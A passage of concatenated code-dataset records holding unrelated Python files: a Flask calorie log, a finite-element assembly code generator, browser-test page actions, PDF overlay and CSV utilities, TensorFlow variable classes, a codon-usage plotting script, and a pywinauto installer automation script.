to_csv(self):\n        return self.datum + \";\" + self.kalorien + \";\" + self.text\n\ndef read_log(filename):\n    log = open(filename, encoding='utf-8')\n    inhalt = []\n    for line in log:\n        zwischenspeicher = line.rstrip().split(\";\")\n        if (len(zwischenspeicher) == 3):\n            fields = line.rstrip().split(\";\")\n            zwischenspeicher = Plan(fields[0], fields[1], fields[2])\n            inhalt.append(zwischenspeicher)\n        elif (len(zwischenspeicher) == 2):\n            fields = line.rstrip().split(\";\")\n            zwischenspeicher = Plan(fields[0], fields[1], \"\")\n            inhalt.append(zwischenspeicher)\n        else:\n            print(\"Error! Entry length is not 2 or 3\")\n    log.close()\n    return inhalt\n\ndef write_log(inhalt):\n    log = open(\"log.txt\", \"w\", encoding='utf-8')\n    for entrys in inhalt:\n        log.write(entrys.to_csv() + \"\\n\")\n    log.close()\n\n\n@app.route('/')\ndef show():\n    inhalt = read_log(\"log.txt\")\n    return render_template('index.html', inhalt=inhalt, heute=heute)\n\n@app.route('/add_entry', methods=[\"POST\"])\ndef add_entry():\n    datum = request.form.get('Datum')\n    datum = datum.split('-')\n    datum = datum[2] + '.' + datum[1] + '.' + datum[0]\n    kalorien = request.form.get('Kalorien')\n    text = request.form.get('Text')\n    log = read_log('log.txt')\n    log.append(Plan(datum, kalorien, text))\n    write_log(log)\n    return redirect('/')\n\n@app.route('/delete_entry')\ndef delete_entry():\n    log=read_log('log.txt')\n    nummer = request.args.get('index')\n    del log[int(nummer)]\n    write_log(log)\n    return redirect('/')\n\n@app.route('/change')\ndef nummer():\n    inhalt = read_log('log.txt')\n    nummer = int(request.args.get('index'))\n    datum = inhalt[nummer].datum\n    datum = datum.split('.')\n    datum = datum[2] + '-' + datum[1] + '-' + datum[0]\n    print(datum)\n    return render_template('change.html', inhalt=inhalt, nummer=nummer, datum=datum)\n\n@app.route('/bearbeiten', methods=[\"POST\"])\ndef bearbeiten():\n    log = read_log('log.txt')\n    nummer = int(request.form.get('nummer'))\n    datum = request.form.get('cDatum')\n    datum = datum.split('-')\n    datum = datum[2] + '.' + datum[1] + '.' 
+ datum[0]\n kalorien = request.form.get('cKalorien')\n text = request.form.get('cText')\n log[nummer] = Plan(datum, kalorien, text)\n write_log(log)\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app_V1.py","file_name":"app_V1.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173773713","text":"# coding: utf-8\n\n# TODO: - allow for giving a name for the trial/test basis\n# - Ni/Nj should be Ni_0/Nj_0\n# - define templates as proper python functions\n# - use redbaron to modify the template\n\n# NOTE: THE PATH OF TEMPLATES IS HARD CODED!\n\n\nfrom sympy.core.containers import Tuple\nfrom sympy import Matrix\nfrom sympy import Integer, Float\n\nfrom numbers import Number\nfrom collections import OrderedDict\n\nfrom numpy import unique\nimport os\nimport importlib\n\nfrom symfe.core import gelatize\nfrom symfe.core import BilinearForm, LinearForm, FunctionForm\nfrom symfe.core import Constant\nfrom symfe.core import Field\n\nfrom .utils import mkdir_p\nfrom .utils import write_code\nfrom .utils import arguments_datatypes_as_dict\nfrom .utils import arguments_datatypes_split\n\nfrom .mapping import construct_mapping_coeffs_name\nfrom .mapping import construct_mapping_get_coeffs\nfrom .mapping import construct_mapping_var\n\nfrom .matrix import construct_element_matrix_names\nfrom .matrix import print_element_matrix_args\nfrom .matrix import print_element_matrix_decs\nfrom .matrix import construct_global_matrix_names\nfrom .matrix import print_global_matrix_args\nfrom .matrix import print_global_matrix_update\nfrom .matrix import construct_argument_matrix_name\nfrom .matrix import print_argument_matrix_kwargs\nfrom .matrix import print_define_global_matrix\n\nfrom .vector import construct_element_vector_names\nfrom .vector import print_element_vector_args\nfrom .vector import print_element_vector_decs\nfrom .vector import construct_global_vector_names\nfrom .vector import print_global_vector_args\nfrom .vector import print_global_vector_decs\nfrom .vector import print_global_vector_update\nfrom .vector import construct_argument_vector_name\nfrom .vector import print_argument_vector_kwargs\nfrom .vector import print_define_global_vector\n\nfrom .array import construct_element_array_names\nfrom .array import print_element_array_args\nfrom .array import print_element_array_decs\nfrom .array import construct_global_array_names\nfrom .array import print_global_array_args\nfrom .array import print_global_array_decs\nfrom .array import print_global_array_update\nfrom .array import construct_argument_array_name\nfrom .array import print_argument_array_kwargs\nfrom .array import print_define_global_array\n\nfrom .field import construct_field_names\nfrom .field import print_field_coeffs_slices\n\n# NOTE: test_n_components, trial_n_components will be provided after calling compile_kernel\ndef compile_assembly(name, a, kernel_name=None,\n verbose=False,\n namespace=globals(),\n context=None,\n is_vector=False,\n test_n_components=1,\n trial_n_components=1,\n backend='python',\n export_pyfile=True):\n \"\"\".\"\"\"\n # ...\n assembly_name = name\n docstring = ''\n if kernel_name is None:\n kernel_name = 'kernel_{}'.format(name)\n # ...\n\n # ... 
weak form attributes\n    dim = a.ldim\n    fields = a.fields\n    mapping = a.mapping\n\n    is_bilinear_form = isinstance(a, BilinearForm)\n    is_linear_form = isinstance(a, LinearForm)\n    is_function_form = isinstance(a, FunctionForm)\n    is_logical = mapping is None\n\n    if is_bilinear_form:\n        form = 'bilinear'\n\n    elif is_linear_form:\n        form = 'linear'\n\n    elif is_function_form:\n        form = 'function'\n    # ...\n\n    # ... constants\n    d_args = arguments_datatypes_as_dict(a.constants)\n    args, dtypes = arguments_datatypes_split(d_args)\n    # ...\n\n    # ... fields\n    fields_str = ''\n    fields_coeffs_str = ''\n    if fields:\n        fields_str = construct_field_names(fields)\n        fields_coeffs_str = print_field_coeffs_slices(fields, dim)\n    # ...\n\n    # ... get name of the template to be used\n    template_str = '_assembly_{form}_{dim}d'.format(dim=dim,\n                                                    form=form)\n    # ...\n\n    # ... import the variable from the templates module\n    # NOTE: THE PATH IS HARD CODED HERE!\n    try:\n        package = importlib.import_module(\"symfe.codegen.templates.assembly\")\n\n    except:\n        raise ImportError('could not import {0}'.format(name))\n\n    template = getattr(package, template_str)\n    # ...\n\n    # ... indentation (def function body)\n    tab = ' '*4\n    # ...\n\n    # ...\n    n_rows = test_n_components\n    n_cols = trial_n_components\n    # ...\n\n    # ...\n    argument_mat = ''\n    argument_mat_kwargs = ''\n\n    global_mat_args = ''\n    global_mat_args_str = ''\n    global_mat_decs_str = ''\n    global_mat_update_str = ''\n\n    element_mat_args = ''\n    element_mat_args_str = ''\n    element_mat_decs_str = ''\n\n    argument_vec = ''\n    argument_vec_kwargs = ''\n\n    global_vec_args = ''\n    global_vec_args_str = ''\n    global_vec_decs_str = ''\n    global_vec_update_str = ''\n\n    element_vec_args = ''\n    element_vec_args_str = ''\n    element_vec_decs_str = ''\n\n    argument_arr = ''\n    argument_arr_kwargs = ''\n\n    global_arr_args = ''\n    global_arr_args_str = ''\n    global_arr_decs_str = ''\n    global_arr_update_str = ''\n\n    element_arr_args = ''\n    element_arr_args_str = ''\n    element_arr_decs_str = ''\n\n    element_wise_str = ''\n\n    if is_bilinear_form:\n        argument_mat = construct_argument_matrix_name(n_rows, n_cols)\n        argument_mat_kwargs = print_argument_matrix_kwargs(argument_mat)\n\n        global_mat_args = construct_global_matrix_names(n_rows, n_cols)\n        global_mat_args_str = print_global_matrix_args(n_rows, n_cols, global_mat_args)\n        global_mat_decs_str = print_define_global_matrix(n_rows, n_cols, global_mat_args, argument_mat, tab)\n\n        element_mat_args = construct_element_matrix_names(n_rows, n_cols)\n        element_mat_args_str = print_element_matrix_args(n_rows, n_cols, element_mat_args)\n        element_mat_decs_str = print_element_matrix_decs(n_rows, n_cols, dim, element_mat_args, tab)\n\n        # ...\n        for i in range(0, dim):\n            tab += ' '*4\n\n        global_mat_update_str = print_global_matrix_update(n_rows, n_cols, dim,\n                                                           element_mat_args,\n                                                           global_mat_args,\n                                                           tab)\n        # ...\n\n    elif is_linear_form:\n        argument_vec = construct_argument_vector_name(n_rows)\n        argument_vec_kwargs = print_argument_vector_kwargs(argument_vec)\n\n        global_vec_args = construct_global_vector_names(n_rows)\n        global_vec_args_str = print_global_vector_args(n_rows, global_vec_args)\n        global_vec_decs_str = print_define_global_vector(n_rows, global_vec_args, argument_vec, tab)\n\n        element_vec_args = construct_element_vector_names(n_rows)\n        element_vec_args_str = print_element_vector_args(n_rows, element_vec_args)\n        element_vec_decs_str = print_element_vector_decs(n_rows, dim, element_vec_args, tab)\n\n        # ...\n        for i in range(0, dim):\n            tab += ' '*4\n\n        global_vec_update_str = 
print_global_vector_update(n_rows, dim,\n element_vec_args,\n global_vec_args,\n tab)\n # ...\n\n elif is_function_form:\n argument_arr = construct_argument_array_name(n_rows)\n argument_arr_kwargs = print_argument_array_kwargs(argument_arr)\n\n global_arr_args = construct_global_array_names(n_rows)\n global_arr_args_str = print_global_array_args(n_rows, global_arr_args)\n global_arr_decs_str = print_define_global_array(n_rows, dim, global_arr_args, argument_arr, tab)\n\n element_arr_args = construct_element_array_names(n_rows)\n element_arr_args_str = print_element_array_args(n_rows, element_arr_args)\n element_arr_decs_str = print_element_array_decs(n_rows, dim, element_arr_args, tab)\n\n # ...\n for i in range(0, dim):\n tab += ' '*4\n\n global_arr_update_str = print_global_array_update(n_rows, dim,\n element_arr_args,\n global_arr_args,\n tab)\n # ...\n\n element_wise_str = ', element_wise=False'\n # TODO improve, not sure this can be pyccelized!!\n argument_arr = '{arg} if element_wise else {arg}.sum()'.format(arg=argument_arr)\n # ...\n\n # ...\n mapping_coeffs_str = ''\n mapping_get_coeffs_str = ''\n mapping_str = ''\n if mapping:\n mapping_coeffs_str = construct_mapping_coeffs_name(mapping)\n mapping_coeffs_str = ', {}'.format(mapping_coeffs_str)\n\n mapping_str = construct_mapping_var()\n mapping_str = ', {}'.format(mapping_str)\n\n mapping_get_coeffs_str = construct_mapping_get_coeffs(dim)\n # ...\n\n # ...\n code = template.format(__ASSEMBLY_NAME__=assembly_name,\n __ARGS__=args,\n __DOCSTRING__=docstring,\n __MAPPING__=mapping_str,\n __MAPPING_GET_COEFFS__=mapping_get_coeffs_str,\n __FIELDS__=fields_str,\n __FIELDS_COEFFS__=fields_coeffs_str,\n\n __ARGUMENT_MAT_KWARGS__=argument_mat_kwargs,\n __GLOBAL_MAT_DEC__=global_mat_decs_str,\n __GLOBAL_MAT_ARGS__=argument_mat,\n __ELEMENT_MAT_DEC__=element_mat_decs_str,\n __ELEMENT_MAT_ARGS__=element_mat_args_str,\n __GLOBAL_MAT_UPDATE__=global_mat_update_str,\n\n __ARGUMENT_VEC_KWARGS__=argument_vec_kwargs,\n __GLOBAL_VEC_DEC__=global_vec_decs_str,\n __GLOBAL_VEC_ARGS__=argument_vec,\n __ELEMENT_VEC_DEC__=element_vec_decs_str,\n __ELEMENT_VEC_ARGS__=element_vec_args_str,\n __GLOBAL_VEC_UPDATE__=global_vec_update_str,\n\n __ARGUMENT_ARR_KWARGS__=argument_arr_kwargs,\n __GLOBAL_ARR_DEC__=global_arr_decs_str,\n __GLOBAL_ARR_ARGS__=argument_arr,\n __ELEMENT_ARR_DEC__=element_arr_decs_str,\n __ELEMENT_ARR_ARGS__=element_arr_args_str,\n __GLOBAL_ARR_UPDATE__=global_arr_update_str,\n\n __ELEMENT_WISE__=element_wise_str,\n\n __KERNEL_NAME__=kernel_name)\n # ...\n\n# print('--------------')\n# print(code)\n# print('--------------')\n# import sys; sys.exit(0)\n\n # ...\n if context:\n from pyccel.epyccel import ContextPyccel\n\n if isinstance(context, ContextPyccel):\n context = [context]\n elif isinstance(context, (list, tuple)):\n for i in context:\n assert(isinstance(i, ContextPyccel))\n else:\n raise TypeError('Expecting a ContextPyccel or list/tuple of ContextPyccel')\n\n # append functions to the namespace\n for c in context:\n for k,v in list(c.functions.items()):\n namespace[k] = v[0]\n # ...\n\n # ...\n exec(code, namespace)\n assembly = namespace[name]\n # ...\n\n # ... 
export the python code of the module\n if export_pyfile:\n write_code(name, code, ext='py', folder='.pyccel')\n # ...\n\n return assembly\n","sub_path":"symfe/codegen/assembly.py","file_name":"assembly.py","file_ext":"py","file_size_in_byte":11682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"209571540","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Open Software License (\"OSL\") v. 3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.opensource.org/licenses/osl-3.0.php\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport time\n\nfrom pyccuracy.page import PageRegistry, Page\nfrom pyccuracy.actions import ActionBase\nfrom pyccuracy.languages import LanguageItem\n\nclass PageGoToAction(ActionBase):\n '''Navigates to a page or url.'''\n regex = LanguageItem('page_go_to_regex')\n\n def execute(self, context, url):\n page, resolved_url = PageRegistry.resolve(context.settings, url.replace('\"', ''), must_raise=False)\n\n if not resolved_url or (not url.startswith('\"') and not page):\n raise self.failed(context.language.format(\"page_go_to_failure\", url))\n\n context.browser_driver.page_open(resolved_url)\n context.browser_driver.wait_for_page()\n context.url = resolved_url\n if page:\n # If the resolved page is the same as the current one, \n # there's not need to override the context page, risking\n # losing all the re-registered elements of the users.\n if not isinstance(context.current_page, page):\n context.current_page = page()\n if hasattr(context.current_page, \"register\"):\n context.current_page.register()\n\nclass PageAmInAction(ActionBase):\n '''Changes the current page without actually navigating to it.'''\n regex = LanguageItem(\"page_am_in_regex\")\n\n def execute(self, context, url):\n page, resolved_url = PageRegistry.resolve(context.settings, url, must_raise=False)\n\n if page:\n # If the resolved page is the same as the current one, \n # there's not need to override the context page, risking\n # losing all the re-registered elements of the users.\n if not isinstance(context.current_page, page):\n context.current_page = page()\n if hasattr(context.current_page, \"register\"):\n context.current_page.register()\n context.url = resolved_url\n else:\n raise self.failed(context.language.format(\"page_am_in_failure\", url))\n\nclass PageSeeTitleAction(ActionBase):\n '''Verifies that the current page's title matches the specified one. 
Raises otherwise.'''\n regex = LanguageItem('page_see_title_regex')\n\n def execute(self, context, title):\n expected_title = context.browser_driver.get_title()\n if (title != expected_title):\n raise self.failed(context.language.format(\"page_see_title_failure\", title, expected_title))\n\nclass PageCheckContainsMarkupAction(ActionBase):\n regex = LanguageItem(\"page_check_contains_markup_regex\")\n\n def execute(self, context, expected_markup):\n html = context.browser_driver.get_html_source()\n\n if expected_markup not in html:\n msg = context.language.format(\"page_check_contains_markup_failure\", expected_markup)\n raise self.failed(msg)\n\nclass PageCheckDoesNotContainMarkupAction(ActionBase):\n regex = LanguageItem(\"page_check_does_not_contain_markup_regex\")\n\n def execute(self, context, expected_markup):\n html = context.browser_driver.get_html_source()\n\n if expected_markup in html:\n msg = context.language.format(\"page_check_does_not_contain_markup_failure\", expected_markup)\n raise self.failed(msg)\n\nclass PageSeeTitleAction(ActionBase):\n regex = LanguageItem(\"page_see_title_regex\")\n\n def execute(self, context, title):\n actual_title = context.browser_driver.get_title()\n if (actual_title != title):\n msg = context.language.format(\"page_see_title_failure\", actual_title, title)\n raise self.failed(msg)\n\nclass PageWaitForPageToLoadAction(ActionBase):\n regex = LanguageItem(\"page_wait_for_page_to_load_regex\")\n\n def execute(self, context, timeout):\n try:\n timeout = float(timeout)\n except Exception:\n timeout = None\n\n if timeout:\n context.browser_driver.wait_for_page(timeout * 1000)\n else:\n context.browser_driver.wait_for_page()\n\nclass PageWaitForSecondsAction(ActionBase):\n regex = LanguageItem(\"page_wait_for_seconds_regex\")\n\n def execute(self, context, timeout):\n try:\n timeout = float(timeout)\n except ValueError:\n raise self.failed(\"The specified time cannot be parsed into a float number: %s\" % timeout)\n\n time.sleep(timeout)\n\n","sub_path":"pyccuracy/actions/core/page_actions.py","file_name":"page_actions.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"180202947","text":"import json\n\nfrom pdf_text_overlay import pdf_writer, pdf_from_template\n\nconfiguration = json.loads(\"\"\"\n [{\n \"page_number\": 0,\n \"variables\":[\n {\n \"name\": \"first_name\",\n \"x-coordinate\": 130,\n \"y-coordinate\": 710,\n \"font_size\": 10\n },\n {\n \"name\": \"last_name\",\n \"x-coordinate\": 130,\n \"y-coordinate\": 695,\n \"font_size\": 8\n }]\n}]\"\"\")\n\ndata = json.loads(\"\"\"\n {\n \"first_name\": \"Goli\",\n \"last_name\": \"Male\",\n \"user_ifsc\": \"HDFC0004421\",\n \"bank_name\": \"HDFC BANK\"\n }\n\"\"\")\n\noriginal_pdf = open(\"Blank_Pdf.pdf\", \"rb\")\nfont = open(\"Lato-Italic.ttf\", \"rb\")\noutput = pdf_writer(original_pdf, configuration, data, font)\noutputStream = open(\"output.pdf\", \"wb\")\noutput.write(outputStream)\noutputStream.close()\n\n# Demo: pdf from jinja template\njinja_data = {\n \"title\": \"Jinja PDF Demo\",\n \"stocks\": [\n {\"symbol\": \"PIEDPIPER\", \"qty\": 100, \"price\": 2500},\n {\"symbol\": \"HOOLI\", \"qty\": 100, \"price\": 2500},\n ]\n}\n\nwith open(\"template.html\") as htmlfile:\n html_str = htmlfile.read()\n filecontent = pdf_from_template(html_str, jinja_data)\n f = open('output.pdf', 'wb')\n f.write(filecontent)\n 
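# close the handle so the rendered PDF bytes are fully flushed to disk\n    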
f.close()\n","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243701394","text":"def read_csv(path_to_csv_file, delimiter=\",\"):\r\n try:\r\n with open(path_to_csv_file) as inp:\r\n new_file = []\r\n for line in inp:\r\n line = line.strip()\r\n new_line = [i for i in line.split(delimiter)]\r\n if '\"' in line:\r\n word = ''\r\n new_line_2 = []\r\n for elem in new_line:\r\n if elem[0] == '\"' and elem[-1] == '\"':\r\n new_line_2.append(elem[1:(len(elem) - 1)])\r\n elif elem[0] == '\"':\r\n word += elem[1:(len(elem))] + delimiter\r\n elif elem[-1] == '\"':\r\n word += elem[0:(len(elem) - 1)]\r\n new_line_2.append(word)\r\n word = ''\r\n elif len(word) != 0:\r\n word += elem + delimiter\r\n else:\r\n new_line_2.append(elem)\r\n new_line = new_line_2\r\n new_file.append(new_line)\r\n return new_file\r\n\r\n except FileNotFoundError:\r\n print(\"Error, such file doesn't exist\")\r\n return []\r\n\r\n\r\ndef write_csv(path_to_csv_file: str, data: list, delimiter=','):\r\n if type(path_to_csv_file) != str or type(data) != list or type(delimiter) != str:\r\n print(\"Arguments: path_to_csv_file (str, create/rewrite file), data (list), delimeter (str: 'symbol')\")\r\n else:\r\n with open(path_to_csv_file, \"w\") as file:\r\n for elem in data:\r\n for i in range(len(elem) - 1):\r\n if delimiter in elem[i]:\r\n file.write('\"' + elem[i] + '\"')\r\n else:\r\n file.write(elem[i] + delimiter)\r\n if delimiter in elem[-1]:\r\n file.write('\"' + elem[-1] + '\"')\r\n else:\r\n file.write(elem[-1])\r\n file.write('\\n')\r\n\r\n\r\n\r\n\r\n","sub_path":"mycsv.py","file_name":"mycsv.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418973306","text":"import tensorflow as tf\nimport sys\n\nclass DNNVariable(object):\n def __init__(self,topologies):\n self._weights = []\n self._biases = []\n for l in range(1, len(topologies)):\n layer_weight = tf.Variable(tf.random_normal(topologies[l-1:l+1], stddev=0.01))\n self._weights.append(layer_weight)\n layer_biases = tf.Variable(tf.constant(0.1, shape=topologies[l:l+1]))\n self._biases.append(layer_biases)\n\n @property\n def weights(self):\n return self._weights\n \n @property\n def weight_values(self):\n values = []\n for l in range(len(self._weights)):\n values.append(self._weights[l].eval())\n return values;\n \n @property\n def biases(self):\n return self._biases\n \n @property\n def bias_values(self):\n values = []\n for l in range(len(self._biases)):\n values.append(self._biases[l].eval())\n return values;\n \nclass NNConstVariable(object):\n def __init__(self,src_variable):\n self._weights =[]\n self._biases = []\n for layer in src_variable:\n layer_weight =[]\n layer_bias = []\n for src_node in layer:\n layer_weight.append(src_node[0:-1])\n layer_bias.append(src_node[-1])\n print(src_node)\n pause = sys.stdin.readline()\n self._weights.append(tf.Variable(tf.constant(layer_weight)))\n self._biases.append(tf.Variable(tf.constant(layer_bias)))\n\n @property\n def weights(self):\n return self._weights\n \n @property\n def weight_values(self):\n values = []\n for l in range(len(self._weights)):\n values.append(self._weights[l].eval())\n return values;\n \n @property\n def biases(self):\n return self._biases\n \n @property\n def bias_values(self):\n values = []\n for l in range(len(self._biases)):\n 
values.append(self._biases[l].eval())\n return values;\n \n","sub_path":"quiz_trainer/dnn_variable.py","file_name":"dnn_variable.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"505580482","text":"import itertools\n\ndef getDistances(ListOfWords, GroupSize = 4):\n\tConcatenated = ''.join(ListOfWords)\n\tUniqueChars = set(Concatenated)\n\t\n\tDistances = []\n\t\n\tGroups = itertools.combinations(UniqueChars, GroupSize)\n\tfor Group in Groups:\n\t\tMaxDist = 0\n\t\tAllDists = []\n\t\t\n\t\tCurrentDist = 0\n\t\tfor Char in Concatenated:\n\t\t\tif Char in Group:\n\t\t\t\tif CurrentDist > MaxDist:\n\t\t\t\t\tMaxDist = CurrentDist\n\t\t\t\tAllDists.append(CurrentDist)\n\t\t\t\tCurrentDist = 0\n\t\t\telse:\n\t\t\t\tCurrentDist += 1\n\t\t# Check last distance too\n\t\tif CurrentDist > 0:\n\t\t\tAllDists.append(CurrentDist)\n\t\t\tif CurrentDist > MaxDist:\n\t\t\t\tMaxDist = CurrentDist\n\t\n\t\tAverageDist = round(sum(AllDists)/float(len(AllDists)), 3)\n\t\tDistances.append([str(Group), MaxDist, AverageDist])\n\t\t\n\treturn Distances\n\ndef sortDistances(Distances):\n\treturn sorted(Distances, key=lambda x: (x[1], x[2]))\n","sub_path":"lib/GroupDistance.py","file_name":"GroupDistance.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"598317278","text":"import matplotlib.pyplot as plt\nimport sys\n\n# file name from command line\ndata = sys.argv[1]\n\nwith open(data, 'r') as f:\n # x stores data of locus #, y stores CUI\n x = []\n y = []\n # parse protein-CUI list\n for line in f:\n # add protein score and name to data lists\n line = line.rstrip().split('\\t')\n line[0] = line[0].rstrip()\n x.append(int(line[0][1:]))\n y.append(float(line[1]))\n xy = dict(zip(x,y))\n # CUI vs. chr order plot, separate series for ribo and other proteins\n plt.figure(1)\n plt.scatter([x for x in sorted(xy)], [xy[x] for x in sorted(xy)], marker='.',\\\n edgecolors='none')\n plt.title('CUI vs. genes in chromosomal order')\n plt.xlabel('Genes (chromosomal order)')\n plt.ylabel('Codon Usage Index')\n # CUI in ascending order plot \n plt.figure(2)\n plt.scatter(range(1, len(y)+1), sorted(y), marker='.', edgecolors='none')\n plt.title('CUI vs. 
genes in ascending order')\n plt.xlabel('Genes (ascending order)')\n plt.ylabel('Codon Usage Index')\n # CUI histogram plot\n plt.figure(3)\n plt.hist(y)\n plt.title('Histogram of CUIs')\n plt.xlabel('Codon Usage Index')\n plt.ylabel('Count')\n plt.show()\n","sub_path":"src/Week 2/Exercise4-plot.py","file_name":"Exercise4-plot.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587114127","text":"######################################################################################################################################\r\n'''\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t \r\nThis first part is for installing the 3.6.1 and the SQL server on a fresh os\t\t\t\r\n\r\nconfigSettingsList indexes -\r\n0 - Reporter account email\r\n1 - Reporter account password\r\n2 - Web application port\r\n3 - IP address\r\n4 - Host header name\r\n5 - Query Engine port\r\n6 - PDFService port \r\n7 - Database server \r\n8 - Server login ID\r\n9 - Server password\r\n10 - Reporter database name\r\n11 - Reverse Proxy\r\n12 - Windows authentication credentials \r\n\r\n''' \t\t\t\t\t\t\t\t\t\t\t \r\n######################################################################################################################################\r\ndef fresh_install_main(pr,sql,configSettingsList):\r\n\tprint(\"Importing\")\r\n\r\n\ttry:\r\n\t\tfrom pywinauto.keyboard import SendKeys\r\n\t\timport time\r\n\t\timport pywinauto\r\n\t\tfrom pywinauto import application\r\n\t\timport guiFunctions\r\n\r\n\texcept:\r\n\t\tprint(\"Import failed\")\r\n\t\traise Exception()\r\n\r\n\r\n\tprint(\"Starting installer\")\r\n\ttry:\r\n\t\tapp = application.Application(backend = \"uia\")\r\n\t\tapp.start(sql) #Starts the installer at the sql path\r\n\r\n\texcept:\r\n\t\tprint(\"Failed to start installer\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Connecting to Install sheild wizard\")\r\n\ttry:\t\r\n\t\tpywinauto.application.WindowSpecification(dict(title = \"RC-Reporter - InstallShield Wizard\", class_name = '#32770')).Install.wait(\"exists ready\",20,0.5)\r\n\t\twizard = app['RC-Reporter - InstallShield Wizard']\r\n\t\twizard.Install.click()\r\n\texcept: \r\n\t\tprint(\"Failed to connect\")\r\n\t\traise Exception()\r\n\t\r\n\t\t\r\n\tprint(\"Configuring database\")\r\n\t#Wait for configuraction database window to popup\r\n\ttry:\r\n\t\tif pywinauto.application.WindowSpecification(dict(title = \"Configuration Database\", class_name = '#32770')).Yes.exists(20,0.5) == True:\r\n\t\t\tapp.connect(title = \"Configuration Database\")\r\n\t\t\tconfig_database = app['Configuration Database']\r\n\r\n\t\t\tconfig_database.Yes.click()\r\n\texcept:\r\n\t\tprint(\"Failed to configure database\")\r\n\t\traise Exception()\r\n\t\r\n\t#Wait for IIS window to pop-up\r\n\tprint(\"Configuring IIS\")\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"Warning\", class_name = '#32770')).Yes.wait(\"exists ready\",720,1)\r\n\t\tapp.connect(title= \"Warning\")\r\n\t\twarning_dlg = app['Warning']\r\n\t\twarning_dlg.set_focus()\r\n\t\twarning_dlg.Yes.click()\r\n\texcept:\r\n\t\tprint(\"Failed to configure IIS\")\r\n\t\traise Exception()\r\n\r\n\t#Wait for installer to pop back up\r\n\tprint(\"Connecting to install shield wizard\")\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).wait(\"exists 
ready\",720,1)\r\n\t\tapp.connect(title = \"RC-Reporter - InstallShield Wizard\")\r\n\t\twizard2 = app['RC-Reporter - InstallShield Wizard']\r\n\r\n\texcept:\r\n\t\tprint(\"Could not connect to install sheild wizard\")\r\n\t\traise Exception()\r\n\r\n\tprint(\"Configuring settings\")\r\n\r\n\ttry:\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5) #Just a buffer to make sure clicks are not executed before the window is actually ready\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Back.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Back.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.RadioButton2.click()\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Button3.exists(20,0.5)\r\n\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).Next.wait(\"exists ready\",10,0.5)\r\n\t\twizard2.Next.wait('ready',5,0.25)\r\n\t\ttime.sleep(0.5)\r\n\t\twizard2.Next.click()\r\n\t\t\r\n\t\t#Wait for the next window to exist\r\n\t\tpywinauto.application.WindowSpecification(dict(title = u\"RC-Reporter - InstallShield Wizard\", class_name = 'MsiDialogCloseClass')).RadioButton0.exists(20,0.5)\r\n\r\n\t\tflag = False\r\n\r\n\t\tfor i in range(2,6):\t#Checks all the textboxes to the user has entered anything\r\n\t\t\tif configSettingsList[i] != \"\":\r\n\t\t\t\tflag = True\r\n\r\n\t\tif configSettingsList[11] == \"true\":\t#Checks the reverse proxy check box\r\n\t\t\tflag = True\r\n\r\n\t\tif flag == True:\t#If this flag is true, the user has enterd one of the settings under custom settings so we run this block of code to enter it\r\n\t\t\ttry:\r\n\t\t\t\tprint(\"Entering custom settings\")\r\n\r\n\t\t\t\t'''\r\n\t\t\t\tEdit1 = IP Address\r\n\t\t\t\tEdit2 = Host header name\r\n\t\t\t\tEdit3 = PDF service Port\r\n\t\t\t\tEdit4 = Web Application Port\r\n\t\t\t\tEdit5 = Query Engine Port\r\n\t\t\t\t'''\r\n\r\n\t\t\t\twizard2.RadioButton2.wait('ready',2,0.25)\r\n\t\t\t\twizard2.RadioButton2.click()\r\n\t\t\t\twizard2.Edit1.wait('ready',2,0.25)\r\n\r\n\t\t\t\tif configSettingsList[2] != \"\":\t#Web app port\r\n\t\t\t\t\twizard2.Edit4.type_keys(configSettingsList[2])\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\tif configSettingsList[3] != \"\":\t#Ip 